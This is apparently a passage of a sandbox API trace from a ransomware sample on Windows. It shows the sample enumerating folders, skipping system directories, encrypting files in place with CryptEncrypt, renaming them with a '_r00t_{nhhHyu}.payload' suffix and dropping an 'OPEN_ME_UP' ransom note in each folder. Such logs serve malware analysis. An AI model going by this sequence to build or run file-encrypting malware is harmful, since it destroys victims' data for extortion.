CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1055\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1055\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.020] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0060.021] CloseHandle (hObject=0x430) returned 1 [0060.021] GetProcessHeap () returned 0x5e0000 [0060.021] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0060.021] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="2052", cAlternateFileName="")) returned 1 [0060.021] lstrcmpiW (lpString1="2052", lpString2="Windows") returned -1 [0060.021] lstrcmpiW (lpString1="2052", lpString2="$Recycle.bin") returned 1 [0060.021] lstrcmpiW (lpString1="2052", lpString2="System Volume Information") returned -1 [0060.021] lstrcmpiW (lpString1="2052", lpString2="Program Files") returned -1 [0060.021] lstrcmpiW (lpString1="2052", lpString2="Program Files (x86)") returned -1 [0060.021] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052") returned 30 [0060.021] lstrcmpW (lpString1="2052", lpString2=".") returned 1 [0060.021] lstrcmpW (lpString1="2052", lpString2="..") returned 1 [0060.022] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\2052", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.022] GetProcessHeap () returned 0x5e0000 [0060.022] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0060.022] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\*") returned 32 [0060.022] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606120 [0060.022] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.022] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.022] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.022] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.022] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.022] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\.") returned 32 [0060.022] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.022] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.022] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.022] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.022] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.022] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.022] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.022] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\..") returned 33 [0060.022] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.022] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.022] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.022] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0060.022] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0060.022] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0060.022] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0060.022] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0060.022] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 39 [0060.022] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0060.022] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.022] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0060.023] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.023] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.023] GetTickCount () returned 0x114f6f4 [0060.023] GetTickCount () returned 0x114f6f4 [0060.023] GetTickCount () returned 0x114f6f4 [0060.023] GetTickCount () returned 0x114f6f4 [0060.023] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.023] GetProcessHeap () returned 0x5e0000 [0060.023] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.023] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x16c3, lpOverlapped=0x0) returned 1 [0060.025] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffe93d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.025] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x16c3, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x16c3, lpOverlapped=0x0) returned 1 [0060.025] GetProcessHeap () returned 0x5e0000 [0060.025] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.025] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.025] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.025] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.025] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.025] CloseHandle (hObject=0x438) returned 1 [0060.026] GetProcessHeap () returned 0x5e0000 [0060.026] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.026] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0060.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\2052\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0060.029] GetProcessHeap () returned 0x5e0000 [0060.029] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.029] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.029] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0060.029] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0060.029] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0060.029] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0060.029] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0060.029] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml") returned 48 [0060.029] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0060.029] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.029] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0060.029] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.029] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.029] GetTickCount () returned 0x114f703 [0060.029] GetTickCount () returned 0x114f703 [0060.029] GetTickCount () returned 0x114f703 [0060.029] GetTickCount () returned 0x114f703 [0060.029] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.029] GetProcessHeap () returned 0x5e0000 [0060.029] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.029] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.031] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.031] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.032] GetProcessHeap () returned 0x5e0000 [0060.032] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.032] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.032] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.032] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.032] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.032] CloseHandle (hObject=0x438) returned 1 [0060.034] GetProcessHeap () returned 0x5e0000 [0060.034] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.034] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0060.034] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\2052\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0060.035] GetProcessHeap () returned 0x5e0000 [0060.035] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.035] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.035] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0060.035] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0060.035] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0060.035] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0060.035] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0060.035] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned 49 [0060.035] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0060.035] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0060.035] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0060.035] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0060.035] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0060.035] GetTickCount () returned 0x114f703 [0060.035] GetTickCount () returned 0x114f703 [0060.035] GetTickCount () returned 0x114f703 [0060.035] GetTickCount () returned 0x114f703 [0060.035] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0060.035] GetProcessHeap () returned 0x5e0000 [0060.035] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0060.035] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.037] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0060.037] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0060.037] GetProcessHeap () returned 0x5e0000 [0060.037] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.037] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.037] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0060.038] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0060.038] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0060.038] CloseHandle (hObject=0x438) returned 1 [0060.039] GetProcessHeap () returned 0x5e0000 [0060.039] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0060.039] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0060.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\2052\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0060.039] GetProcessHeap () returned 0x5e0000 [0060.039] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0060.039] FindNextFileW (in: hFindFile=0x606120, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.039] FindClose (in: hFindFile=0x606120 | out: hFindFile=0x606120) returned 1 [0060.040] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2052\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0060.040] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2052\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\2052\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0060.040] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0060.041] CloseHandle (hObject=0x430) returned 1 [0060.042] GetProcessHeap () returned 0x5e0000 [0060.042] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0060.042] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="2070", cAlternateFileName="")) returned 1 [0060.042] lstrcmpiW (lpString1="2070", lpString2="Windows") returned -1 [0060.042] lstrcmpiW (lpString1="2070", lpString2="$Recycle.bin") returned 1 [0060.042] lstrcmpiW (lpString1="2070", lpString2="System Volume Information") returned -1 [0060.042] lstrcmpiW (lpString1="2070", lpString2="Program Files") returned -1 [0060.042] lstrcmpiW (lpString1="2070", lpString2="Program Files (x86)") returned -1 [0060.042] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070") returned 30 [0060.042] lstrcmpW (lpString1="2070", lpString2=".") returned 1 [0060.042] lstrcmpW (lpString1="2070", lpString2="..") returned 1 [0060.042] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\2070", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0060.042] GetProcessHeap () returned 0x5e0000 [0060.042] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0060.042] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\*") returned 32 [0060.042] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606820 [0060.042] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0060.042] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0060.042] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0060.042] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0060.042] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0060.042] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\.") returned 32 [0060.042] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.043] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0060.043] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0060.043] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0060.043] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0060.043] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0060.043] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0060.043] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\2070\\..") returned 33 [0060.043] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0060.043] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.043] FindNextFileW (in: hFindFile=0x606820, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, 